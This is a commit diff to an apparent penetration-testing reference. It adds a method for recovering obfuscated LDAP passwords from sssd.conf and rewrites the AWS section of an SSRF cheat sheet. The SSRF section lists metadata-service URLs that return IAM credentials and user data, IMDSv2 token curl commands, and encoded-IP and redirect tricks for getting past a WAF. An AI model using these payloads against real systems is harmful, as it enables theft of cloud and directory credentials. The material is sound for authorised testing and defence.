AWS EC2 Metadata + SSSD token deobfuscate

Methodology and Resources/Active Directory Attack.md

@@ -143,6 +143,7 @@
     - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm)
     - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab)
     - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
+    - [Extract accounts from /etc/sssd/sssd.conf](#extract-accounts-from-etcsssdsssdconf)
   - [References](#references)
 
 ## Tools
@@ -4276,6 +4277,33 @@ $ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c
 CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0  
 ```
 
+
+## Extract accounts from /etc/sssd/sssd.conf
+
+> sss_obfuscate converts a given password into human-unreadable format and places it into appropriate domain section of the SSSD config file, usually located at /etc/sssd/sssd.conf
+
+The obfuscated password is put into "ldap_default_authtok" parameter of a given SSSD domain and the "ldap_default_authtok_type" parameter is set to "obfuscated_password". 
+
+```ini
+[sssd]
+config_file_version = 2
+...
+[domain/LDAP]
+...
+ldap_uri = ldap://127.0.0.1
+ldap_search_base = ou=People,dc=srv,dc=world
+ldap_default_authtok_type = obfuscated_password
+ldap_default_authtok = [BASE64_ENCODED_TOKEN]
+```
+
+De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_deobfuscate](https://github.com/mludvig/sss_deobfuscate)
+
+```ps1
+./sss_deobfuscate [ldap_default_authtok_base64_encoded]
+./sss_deobfuscate AAAQABagVAjf9KgUyIxTw3A+HUfbig7N1+L0qtY4xAULt2GYHFc1B3CBWGAE9ArooklBkpxQtROiyCGDQH+VzLHYmiIAAQID
+```
+
+
 ## References
 
 * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)

Methodology and Resources/Cloud - AWS Pentest.md

@@ -249,7 +249,7 @@
 :warning: Only working with IMDSv1.
 Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
 
-In order to usr IMDSv2 you must provide a token.
+In order to use IMDSv2 you must provide a token.
 
 ```powershell
 export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`

Server Side Request Forgery/README.md

@@ -545,77 +545,80 @@ Example of a PDF attachment using HTML
 
 ## SSRF URL for Cloud Instances
 
-### SSRF URL for AWS Bucket
+### SSRF URL for AWS
 
-[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
-Interesting path to look for at `http://169.254.169.254` or `http://instance-data`
+The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
 
-```powershell
-Always here : /latest/meta-data/{hostname,public-ipv4,...}
-User data (startup script for auto-scaling) : /latest/user-data
-Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
-```
 
-DNS record
+* Old endpoint: `http://169.254.169.254/latest/meta-data/`
+* New endpoint requires the header `X-aws-ec2-metadata-token`
+  ```powershell
+  export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
+  curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
+  ```
 
-```powershell
-http://instance-data
-http://169.254.169.254
-http://169.254.169.254.nip.io/
-```
+In case of a WAF, you might want to try different ways to connect to the API.
+* DNS record pointing to the AWS API IP
+  ```powershell
+  http://instance-data
+  http://169.254.169.254
+  http://169.254.169.254.nip.io/
+  ```
+* HTTP redirect
+  ```powershell
+  Static:http://nicob.net/redir6a
+  Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
+  ```
+* Encoding the IP to bypass WAF
+  ```powershell
+  http://425.510.425.510 Dotted decimal with overflow
+  http://2852039166 Dotless decimal
+  http://7147006462 Dotless decimal with overflow
+  http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal
+  http://0xA9FEA9FE Dotless hexadecimal
+  http://0x41414141A9FEA9FE Dotless hexadecimal with overflow
+  http://0251.0376.0251.0376 Dotted octal
+  http://0251.00376.000251.0000376 Dotted octal with padding
+  http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
+  http://[::ffff:a9fe:a9fe] IPV6 Compressed
+  http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded
+  http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4
+  ```
 
-HTTP redirect
 
+These URLs return a list of IAM roles associated with the instance. You can then append the role name to this URL to retrieve the security credentials for the role.
 ```powershell
-Static:http://nicob.net/redir6a
-Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
-```
+http://169.254.169.254/latest/meta-data/iam/security-credentials
+http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
 
-Alternate IP encoding
+# Examples
+http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
+http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
+http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
+```
 
+This URL is used to access the user data that was specified when launching the instance. User data is often used to pass startup scripts or other configuration information into the instance.
 ```powershell
-http://425.510.425.510/ Dotted decimal with overflow
-http://2852039166/ Dotless decimal
-http://7147006462/ Dotless decimal with overflow
-http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
-http://0xA9FEA9FE/ Dotless hexadecimal
-http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
-http://0251.0376.0251.0376/ Dotted octal
-http://0251.00376.000251.0000376/ Dotted octal with padding
-http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
+http://169.254.169.254/latest/user-data
 ```
 
-More urls to include
-
+Other URLs to query to access various pieces of metadata about the instance, like the hostname, public IPv4 address, and other properties.
 ```powershell
-http://169.254.169.254/latest/user-data
-http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
 http://169.254.169.254/latest/meta-data/
-http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
-http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
 http://169.254.169.254/latest/meta-data/ami-id
 http://169.254.169.254/latest/meta-data/reservation-id
 http://169.254.169.254/latest/meta-data/hostname
 http://169.254.169.254/latest/meta-data/public-keys/
 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
-http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
-http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
 http://169.254.169.254/latest/dynamic/instance-identity/document
 ```
 
-AWS SSRF Bypasses
-```
-Converted Decimal IP: http://2852039166/latest/meta-data/
-IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
-IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
-IPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/
-```
-
 E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
 
 E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
 
+
 ### SSRF URL for AWS ECS
 
 If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.